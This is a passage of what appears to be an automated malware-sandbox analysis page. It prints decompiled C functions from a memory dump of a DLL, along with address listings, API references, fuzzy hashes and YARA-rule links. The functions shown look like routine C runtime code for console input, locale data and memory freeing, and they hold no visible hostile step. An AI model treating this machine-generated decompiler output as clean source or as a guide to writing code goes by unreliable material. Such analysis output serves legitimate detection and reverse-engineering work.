											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E6E537E39(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E6E537E6F(__eflags))) = 9;
											 *(E6E537E5C(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x6e68b718 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E6E53F973();
												} else {
													_t170 = E6E53FC79();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E6E53FB22(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x6e68b718 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E6E537E6F(__eflags))) = 0xc;
									 *(E6E537E5C(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E6E541B83(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x6e68b718 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E6E537E5C(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E6E537E6F(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E6E537E5C(_t246)) =  *_t197 & 0x00000000;
					_t139 = E6E537E6F(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x6e53fe11
0x6e53fe15
0x6e53fe18
0x6e53fe32
0x6e53fe34
0x6e540199
0x6e540199
0x6e54019e
0x6e54019e
0x6e5401a6
0x6e5401ac
0x6e5401ac
0x00000000
0x6e5401ac
0x6e53fe3a
0x6e53fe40
0x00000000
0x00000000
0x6e53fe4a
0x6e53fe50
0x6e53fe53
0x6e53fe56
0x6e53fe60
0x6e53fe63
0x6e53fe66
0x6e53fe6a
0x6e53fe6c
0x00000000
0x00000000
0x6e53fe72
0x6e53fe75
0x6e53fe7b
0x6e53fe95
0x6e53fe97
0x6e540195
0x00000000
0x6e540195
0x6e53fe9d
0x6e53fea0
0x00000000
0x00000000
0x6e53fea6
0x6e53feaa
0x00000000
0x00000000
0x6e53feb0
0x6e53feb3
0x6e53feb7
0x6e53febe
0x6e53fec0
0x6e53fec0
0x6e53fec3
0x6e53ff18
0x6e53ff1a
0x6e53fee0
0x6e53fee5
0x6e53feec
0x6e53fef2
0x00000000
0x6e53ff1c
0x6e53ff1e
0x6e53ff1f
0x6e53ff21
0x6e53ff24
0x6e53ff26
0x6e53ff28
0x6e53ff2a
0x6e53ff2a
0x6e53ff35
0x6e53ff37
0x6e53ff3e
0x6e53ff43
0x6e53ff46
0x6e53ff49
0x6e53ff4b
0x6e53ff6f
0x6e53ff77
0x6e53ff7a
0x6e53ff81
0x6e53ff88
0x6e53ff8c
0x6e53ff8e
0x6e53ff91
0x6e53ff98
0x6e53ff98
0x6e53ff9b
0x6e53ff9d
0x6e53ffa0
0x6e53ffa5
0x6e53ffa8
0x6e53ffb1
0x6e53ffb5
0x6e53ffb8
0x6e53ffba
0x6e53ffc0
0x6e53ffc2
0x6e53ffcb
0x6e53ffcc
0x6e53ffce
0x6e53ffd2
0x6e53ffd3
0x6e53ffd7
0x6e53ffda
0x6e53ffe4
0x6e53ffe9
0x6e53ffec
0x6e53fffb
0x6e53ffff
0x6e540002
0x6e540004
0x6e540006
0x6e540008
0x6e54000d
0x6e54000f
0x6e540013
0x6e540014
0x6e54001a
0x6e540024
0x6e540025
0x6e540028
0x6e54002d
0x6e540030
0x6e54003f
0x6e540043
0x6e540046
0x6e540048
0x6e54004a
0x6e54004c
0x6e54004e
0x6e540054
0x6e540054
0x6e540055
0x6e540064
0x6e540067
0x6e540068
0x6e540068
0x6e54004c
0x6e540048
0x6e540030
0x6e540008
0x6e540004
0x6e53ffec
0x6e53ffc2
0x6e53ffba
0x6e54006e
0x6e540074
0x6e540076
0x6e5400e9
0x6e5400e9
0x6e5400ed
0x6e5400fd
0x6e540103
0x6e540105
0x6e540161
0x6e540161
0x6e540169
0x6e54016a
0x6e54016c
0x6e540185
0x6e540188
0x6e5400c5
0x6e5400c6
0x00000000
0x6e5400cb
0x6e54018e
0x00000000
0x6e54018e
0x6e540173
0x6e54017e
0x00000000
0x6e54017e
0x6e540107
0x6e54010a
0x6e54010d
0x00000000
0x00000000
0x6e54010f
0x6e54010f
0x6e540112
0x6e540115
0x6e540118
0x6e54011f
0x6e540124
0x6e540126
0x6e54012a
0x6e540145
0x6e540149
0x6e54014a
0x6e54014d
0x6e54014e
0x6e54015a
0x6e540150
0x6e540150
0x6e540150
0x6e54012c
0x6e54012c
0x6e54012c
0x6e540137
0x6e54013c
0x6e54013f
0x6e54013f
0x00000000
0x6e540124
0x6e54007b
0x6e54007e
0x6e540085
0x6e54008a
0x00000000
0x00000000
0x6e540093
0x6e540099
0x6e54009b
0x00000000
0x00000000
0x6e54009d
0x6e5400a1
0x00000000
0x00000000
0x6e5400b5
0x6e5400bb
0x6e5400bd
0x6e5400e1
0x6e5400e4
0x00000000
0x6e5400e4
0x6e5400bf
0x00000000
0x6e53ff4d
0x6e53ff52
0x6e53ff5d
0x6e5400cc
0x6e5400cc
0x6e5400cc
0x6e5400cf
0x6e5400d0
0x00000000
0x6e5400d8
0x6e53ff4b
0x6e53ff1a
0x6e53fec5
0x6e53fec8
0x6e53fedc
0x6e53fede
0x6e53feff
0x6e53ff02
0x6e53ff05
0x6e53ff08
0x00000000
0x6e53ff08
0x00000000
0x6e53feca
0x6e53feca
0x6e53fecd
0x6e53fed0
0x00000000
0x6e53fed0
0x6e53fec8
0x6e53fe7d
0x6e53fe82
0x6e53fe8a
0x00000000
0x6e53fe1a
0x6e53fe1f
0x6e53fe22
0x6e53fe27
0x6e5401b1
0x00000000
0x6e5401b1

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca6284d5667932db4e22e103f39db7076e65053ddb430e3434314be4c43e0851
Instruction ID: 37b9cf87e676279d109c281bc4ece7e945b539c315315f65bf8566996336a06a
Opcode Fuzzy Hash: ca6284d5667932db4e22e103f39db7076e65053ddb430e3434314be4c43e0851
Instruction Fuzzy Hash: 50C1B174E0421AEFDB01CFD9C890BAE7BF5AF5A314F20445AE514AB392E7309941CB72

Uniqueness

Uniqueness Score: -1.00%

Function 6E54D8C0, Relevance: 13.7, APIs: 9, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6E54D8C0(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				char _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E6E544550(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E6E541BBD(4);
						_t120 = 0;
						_v8 = _t125;
						E6E541B83(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t53 =  *0x6e688c80; // 0x6e688cd4
								 *_t93 = _t53;
								_t54 =  *0x6e688c84; // 0x6e68b479
								 *((intOrPtr*)(_t93 + 4)) = _t54;
								_t55 =  *0x6e688c88; // 0x6e68b479
								 *((intOrPtr*)(_t93 + 8)) = _t55;
								_t56 =  *0x6e688cb0; // 0x6e688cd8
								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
								_t57 =  *0x6e688cb4; // 0x6e68b47c
								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E6E541BBD(4);
							_v12 = _t121;
							E6E541B83(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_t69 = E6E5466AC(_t93, _t113,  *((intOrPtr*)(_t123 + 0xb0)));
								_t16 = _t93 + 4; // 0x4
								_t71 = E6E5466AC(_t93, _t113,  *((intOrPtr*)(_t123 + 0xb0)),  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16,  &_v24);
								_t18 = _t93 + 8; // 0x8
								_t74 = E6E5466AC(_t93, _t113, _t122,  &_v24, 1, _t122, 0x10, _t18, 1);
								_t77 = E6E5466AC(_t93, _t113, _t122,  &_v24, 2, _t122, 0xe, _t93 + 0x30, _t122);
								_t22 = _t93 + 0x34; // 0x34
								if((E6E5466AC(_t93, _t113, _t122,  &_v24, 2, _t122, 0xf, _t22, 0xe) | _t69 | _t71 | _t74 | _t77) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t82 =  *_t114;
										if(_t82 == 0) {
											break;
										}
										_t30 = _t82 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t82 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t108 =  *((intOrPtr*)(_t130 + 1));
												 *_t130 = _t108;
												_t130 = _t130 + 1;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E6E54D857(_t93);
								E6E541B83(_t93);
								E6E541B83(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E6E541B83(_v8);
								return _v16;
							}
							E6E541B83();
							goto L12;
						}
						E6E541B83(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x6e688c80;
					L21:
					_t60 =  *(_t123 + 0x80);
					if(_t60 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t60 | 0xffffffff) == 0) {
							E6E541B83( *((intOrPtr*)(_t123 + 0x7c)));
							E6E541B83( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

0x6e54d8c0
0x6e54d8ca
0x6e54d8d0
0x6e54d8d3
0x6e54d8dc
0x6e54d8fb
0x6e54d903
0x6e54d909
0x6e54d91c
0x6e54d91d
0x6e54d926
0x6e54d928
0x6e54d92b
0x6e54d92e
0x6e54d937
0x6e54d948
0x6e54d94a
0x6e54d953
0x6e54daa2
0x6e54daa7
0x6e54daa9
0x6e54daae
0x6e54dab1
0x6e54dab6
0x6e54dab9
0x6e54dabe
0x6e54dac1
0x6e54dac6
0x6e54da35
0x6e54da3b
0x6e54da3f
0x6e54da41
0x6e54da41
0x00000000
0x6e54da3f
0x6e54d960
0x6e54d964
0x6e54d967
0x6e54d96e
0x6e54d971
0x6e54d97e
0x6e54d984
0x6e54d990
0x6e54d995
0x6e54d9a4
0x6e54d9ab
0x6e54d9b8
0x6e54d9cc
0x6e54d9d6
0x6e54d9ed
0x6e54da19
0x6e54da29
0x6e54da29
0x6e54da2d
0x00000000
0x00000000
0x6e54da1e
0x6e54da1e
0x6e54da24
0x6e54da90
0x6e54da28
0x6e54da28
0x00000000
0x6e54da28
0x6e54da92
0x6e54da94
0x6e54da94
0x6e54da97
0x6e54da99
0x6e54da9c
0x00000000
0x6e54daa0
0x6e54da26
0x00000000
0x6e54da26
0x6e54da2f
0x6e54da32
0x00000000
0x6e54da32
0x6e54d9f0
0x6e54d9f6
0x6e54d9fe
0x6e54da06
0x6e54da0a
0x6e54da0e
0x00000000
0x6e54da16
0x6e54d973
0x00000000
0x6e54d978
0x6e54d93a
0x00000000
0x6e54d942
0x00000000
0x6e54d8e6
0x6e54d8e6
0x6e54d8e8
0x6e54d8eb
0x6e54da43
0x6e54da43
0x6e54da4b
0x6e54da4d
0x6e54da4d
0x6e54da55
0x6e54da5a
0x6e54da5e
0x6e54da63
0x6e54da6e
0x6e54da74
0x6e54da5e
0x6e54da78
0x6e54da7d
0x6e54da83
0x00000000
0x6e54da83

APIs

_free.LIBCMT ref: 6E54D92E
_free.LIBCMT ref: 6E54D93A
_free.LIBCMT ref: 6E54DA63
_free.LIBCMT ref: 6E54DA6E

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 8e70e95480687dd9fc4bca4b0c347cbb20227d4013b3db5e17eb8f4eb95925b7
Instruction ID: f528f770ea41f0bcae2b5a3dc948b706289cad74bc2110c6c17284ce10f7bc88
Opcode Fuzzy Hash: 8e70e95480687dd9fc4bca4b0c347cbb20227d4013b3db5e17eb8f4eb95925b7
Instruction Fuzzy Hash: DC61D3B1944705EFDB10CFEAC940BAAB7F9AF85710F104969E955EB284EB70ED008B90

Uniqueness

Uniqueness Score: -1.00%

Function 6E543AFA, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E543AFA(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t156;
				void* _t163;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t184;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t213;
				intOrPtr* _t221;
				intOrPtr* _t222;
				char* _t229;
				intOrPtr _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int _t241;
				signed int _t242;
				void* _t247;
				signed int _t248;
				intOrPtr _t250;
				void* _t254;
				signed int _t256;
				signed int _t258;
				signed int _t261;
				signed int* _t262;
				short _t263;
				signed int _t265;
				signed int _t269;
				void* _t271;
				void* _t273;

				_t265 = _t269;
				_t156 =  *0x6e688c24; // 0x8e9367b0
				_v8 = _t156 ^ _t265;
				_push(__ebx);
				_t213 = _a8;
				_push(__esi);
				_push(__edi);
				_t250 = _a4;
				_v736 = _t213;
				_v732 = E6E5410D8(__ecx, __edx) + 0x278;
				_t163 = E6E5431E5(_t213, __edx, _t250, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t271 = _t269 - 0x2e4 + 0x18;
				if(_t163 == 0) {
					L40:
					__eflags = 0;
					goto L41;
				} else {
					_t10 = _t213 + 2; // 0x3
					_t256 = _t10 << 4;
					_t166 =  &_v272;
					_v712 = _t256;
					_t221 =  *((intOrPtr*)(_t256 + _t250));
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t258 = _v712;
						if( *_t166 !=  *_t221) {
							break;
						}
						if( *_t166 == 0) {
							L7:
							_t167 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t166 + 2));
							_v706 = _t263;
							_t258 = _v712;
							if(_t263 !=  *((intOrPtr*)(_t221 + 2))) {
								break;
							} else {
								_t166 = _t166 + 4;
								_t221 = _t221 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L7;
								}
							}
						}
						L9:
						if(_t167 != 0) {
							_t222 =  &_v272;
							_t247 = _t222 + 2;
							do {
								_t168 =  *_t222;
								_t222 = _t222 + 2;
								__eflags = _t168 - _v704;
							} while (_t168 != _v704);
							_v708 = (_t222 - _t247 >> 1) + 1;
							_t171 = E6E541BBD(4 + ((_t222 - _t247 >> 1) + 1) * 2);
							_v724 = _t171;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L40;
							} else {
								_v720 =  *((intOrPtr*)(_t258 + _t250));
								_v740 =  *(_t250 + 0xa0 + _t213 * 4);
								_v744 =  *(_t250 + 8);
								_t229 =  &_v272;
								_v728 = _t171 + 4;
								_t173 = E6E546B92(_t171 + 4, _v708, _t229);
								_t273 = _t271 + 0xc;
								__eflags = _t173;
								if(_t173 != 0) {
									_t174 = _v704;
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									E6E53498C();
									asm("int3");
									_push(_t265);
									_push(_t229);
									_v784 = _v784 & 0x00000000;
									_t177 = E6E544B0D(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t177;
									if(_t177 == 0) {
										L50:
										_t178 = 0xfde9;
									} else {
										_t178 = _v12;
										__eflags = _t178;
										if(_t178 == 0) {
											goto L50;
										}
									}
									return _t178;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t258 + _t250)) = _v728;
									if(_v272 != 0x43) {
										L18:
										_t181 = E6E542F64(_t213, _t250,  &_v700);
										_t248 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L18;
										} else {
											_t248 = _v704;
											_t181 = _t248;
										}
									}
									 *(_t250 + 0xa0 + _t213 * 4) = _t181;
									__eflags = _t213 - 2;
									if(_t213 != 2) {
										__eflags = _t213 - 1;
										if(_t213 != 1) {
											__eflags = _t213 - 5;
											if(_t213 == 5) {
												 *((intOrPtr*)(_t250 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t250 + 0x10)) = _v716;
										}
									} else {
										_t262 = _v732;
										 *(_t250 + 8) = _v716;
										_v708 = _t262[8];
										_t241 = _t262[9];
										_v716 = _t241;
										while(1) {
											__eflags =  *(_t250 + 8) -  *(_t262 + _t248 * 8);
											if( *(_t250 + 8) ==  *(_t262 + _t248 * 8)) {
												break;
											}
											_t210 =  *(_t262 + _t248 * 8);
											_t241 =  *(_t262 + 4 + _t248 * 8);
											 *(_t262 + _t248 * 8) = _v708;
											 *(_t262 + 4 + _t248 * 8) = _v716;
											_t248 = _t248 + 1;
											_t213 = _v736;
											_v708 = _t210;
											_v716 = _t241;
											__eflags = _t248 - 5;
											if(_t248 < 5) {
												continue;
											} else {
											}
											L26:
											__eflags = _t248 - 5;
											if(__eflags == 0) {
												_t202 = E6E54685C(_t213, _t248, _t250, __eflags, _v704, 1, 0x6e626a98, 0x7f,  &_v528,  *(_t250 + 8), 1);
												_t273 = _t273 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t242 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t265 + _t204 * 2 - 0x20c) =  *(_t265 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E6E53139D( &_v528,  *0x6e688edc, 0xfe);
													_t273 = _t273 + 0xc;
													__eflags = _t206;
													_t242 = 0 | _t206 == 0x00000000;
												}
												_t262[1] = _t242;
												 *_t262 =  *(_t250 + 8);
											}
											 *(_t250 + 0x18) = _t262[1];
											goto L38;
										}
										__eflags = _t248;
										if(_t248 != 0) {
											 *_t262 =  *(_t262 + _t248 * 8);
											_t262[1] =  *(_t262 + 4 + _t248 * 8);
											 *(_t262 + _t248 * 8) = _v708;
											 *(_t262 + 4 + _t248 * 8) = _t241;
										}
										goto L26;
									}
									L38:
									_t182 = _t213 * 0xc;
									_t111 = _t182 + 0x6e626b20; // 0x6e4f8da0
									 *0x6e61623c(_t250);
									_t184 =  *((intOrPtr*)( *_t111))();
									_t233 = _v720;
									__eflags = _t184;
									if(_t184 == 0) {
										__eflags = _t233 - 0x6e688fa0;
										if(_t233 != 0x6e688fa0) {
											_t261 = _t213 + _t213;
											__eflags = _t261;
											asm("lock xadd [eax], ecx");
											if(_t261 != 0) {
												goto L45;
											} else {
												E6E541B83( *((intOrPtr*)(_t250 + 0x28 + _t261 * 8)));
												E6E541B83( *((intOrPtr*)(_t250 + 0x24 + _t261 * 8)));
												E6E541B83( *(_t250 + 0xa0 + _t213 * 4));
												_t236 = _v704;
												 *(_v712 + _t250) = _t236;
												 *(_t250 + 0xa0 + _t213 * 4) = _t236;
											}
										}
										_t234 = _v724;
										 *_t234 = 1;
										 *((intOrPtr*)(_t250 + 0x28 + (_t213 + _t213) * 8)) = _t234;
									} else {
										 *((intOrPtr*)(_v712 + _t250)) = _t233;
										E6E541B83( *(_t250 + 0xa0 + _t213 * 4));
										 *(_t250 + 0xa0 + _t213 * 4) = _v740;
										E6E541B83(_v724);
										 *(_t250 + 8) = _v744;
										goto L40;
									}
									goto L41;
								}
							}
						} else {
							L41:
							_pop(_t254);
							return E6E52F227(_v8 ^ _t265, _t254);
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t167 = _t166 | 0x00000001;
					__eflags = _t167;
					goto L9;
				}
				L52:
			}

0x6e543afd
0x6e543b05
0x6e543b0c
0x6e543b0f
0x6e543b10
0x6e543b13
0x6e543b17
0x6e543b18
0x6e543b1b
0x6e543b2b
0x6e543b4e
0x6e543b53
0x6e543b58
0x6e543e0e
0x6e543e0e
0x00000000
0x6e543b5e
0x6e543b5e
0x6e543b61
0x6e543b64
0x6e543b6a
0x6e543b73
0x6e543b75
0x6e543b78
0x6e543b82
0x6e543b88
0x00000000
0x00000000
0x6e543b8e
0x6e543bb7
0x6e543bb7
0x6e543b90
0x6e543b90
0x6e543b98
0x6e543b9f
0x6e543ba5
0x00000000
0x6e543ba7
0x6e543ba7
0x6e543baa
0x6e543bb5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e543bb5
0x6e543ba5
0x6e543bc4
0x6e543bc6
0x6e543bcf
0x6e543bd5
0x6e543bd8
0x6e543bd8
0x6e543bdb
0x6e543bde
0x6e543bde
0x6e543bee
0x6e543bfc
0x6e543c01
0x6e543c08
0x6e543c0a
0x00000000
0x6e543c10
0x6e543c16
0x6e543c23
0x6e543c2c
0x6e543c32
0x6e543c3f
0x6e543c46
0x6e543c4b
0x6e543c4e
0x6e543c50
0x6e543e8e
0x6e543e94
0x6e543e95
0x6e543e96
0x6e543e97
0x6e543e98
0x6e543e99
0x6e543e9e
0x6e543ea1
0x6e543ea4
0x6e543ea5
0x6e543eb7
0x6e543ebc
0x6e543ebe
0x6e543ec7
0x6e543ec7
0x6e543ec0
0x6e543ec0
0x6e543ec3
0x6e543ec5
0x00000000
0x00000000
0x6e543ec5
0x6e543ecd
0x6e543c56
0x6e543c56
0x6e543c64
0x6e543c67
0x6e543c7d
0x6e543c84
0x6e543c89
0x6e543c69
0x6e543c69
0x6e543c71
0x00000000
0x6e543c73
0x6e543c73
0x6e543c79
0x6e543c79
0x6e543c71
0x6e543c90
0x6e543c97
0x6e543c9a
0x6e543d98
0x6e543d9b
0x6e543da8
0x6e543dab
0x6e543db3
0x6e543db3
0x6e543d9d
0x6e543da3
0x6e543da3
0x6e543ca0
0x6e543ca0
0x6e543cac
0x6e543cb2
0x6e543cb8
0x6e543cbb
0x6e543cc1
0x6e543cc4
0x6e543cc7
0x00000000
0x00000000
0x6e543cc9
0x6e543cd2
0x6e543cd6
0x6e543cdf
0x6e543ce3
0x6e543ce4
0x6e543cea
0x6e543cf0
0x6e543cf6
0x6e543cf9
0x00000000
0x00000000
0x6e543cfb
0x6e543d1a
0x6e543d1a
0x6e543d1d
0x6e543d3a
0x6e543d3f
0x6e543d42
0x6e543d44
0x6e543d82
0x6e543d46
0x6e543d46
0x6e543d4c
0x6e543d51
0x6e543d59
0x6e543d5a
0x6e543d5a
0x6e543d71
0x6e543d78
0x6e543d7b
0x6e543d7d
0x6e543d7d
0x6e543d88
0x6e543d8e
0x6e543d8e
0x6e543d93
0x00000000
0x6e543d93
0x6e543cfd
0x6e543cff
0x6e543d04
0x6e543d0a
0x6e543d13
0x6e543d16
0x6e543d16
0x00000000
0x6e543cff
0x6e543db6
0x6e543db6
0x6e543dba
0x6e543dc2
0x6e543dc8
0x6e543dcb
0x6e543dd1
0x6e543dd3
0x6e543e1f
0x6e543e25
0x6e543e2c
0x6e543e2c
0x6e543e32
0x6e543e36
0x00000000
0x6e543e38
0x6e543e3c
0x6e543e45
0x6e543e51
0x6e543e5f
0x6e543e65
0x6e543e68
0x6e543e68
0x6e543e36
0x6e543e77
0x6e543e7f
0x6e543e88
0x6e543dd5
0x6e543ddb
0x6e543de5
0x6e543df7
0x6e543dfe
0x6e543e0b
0x00000000
0x6e543e0b
0x00000000
0x6e543dd3
0x6e543c50
0x6e543bc8
0x6e543e10
0x6e543e14
0x6e543e1e
0x6e543e1e
0x00000000
0x6e543bc6
0x6e543bbf
0x6e543bc1
0x6e543bc1
0x00000000
0x6e543bc1
0x00000000

APIs

Part of subcall function 6E5410D8: GetLastError.KERNEL32(6E53413C,6E53413C,900C408B,6E54571D,?,6E53413C,00000000,?,6E545BD7,6E53413C,?,6E53413C,6E53413C,00000010,6E53956D,00000000), ref: 6E5410DD
Part of subcall function 6E5410D8: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E545BD7,6E53413C,?,6E53413C,6E53413C,00000010,6E53956D,00000000,8304488B,?,?,00000000), ref: 6E54117B

_free.LIBCMT ref: 6E543DE5
_free.LIBCMT ref: 6E543DFE
_free.LIBCMT ref: 6E543E3C
_free.LIBCMT ref: 6E543E45
_free.LIBCMT ref: 6E543E51

Strings

C, xrefs: 6E543C56
-Tn, xrefs: 6E543B13

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID: C$-Tn
API String ID: 3291180501-655861377
Opcode ID: c448c253a4b2f4494f0eb529d4d4260a065c64606b7e014eb3fa9c66d3302ae8
Instruction ID: 489ae50cefed20425764ff223aa779a672a028becfb5a61dfb9ea6b362d96802
Opcode Fuzzy Hash: c448c253a4b2f4494f0eb529d4d4260a065c64606b7e014eb3fa9c66d3302ae8
Instruction Fuzzy Hash: FBB1497590121ADFDB24DF58C888BA9B7F5FF48314F5085AAD949A73A4E730AE90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E4F7920, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E4F7920(void* __ebx, intOrPtr* _a4) {
				signed char _v8;
				char _v16;
				signed char _v20;
				char _v24;
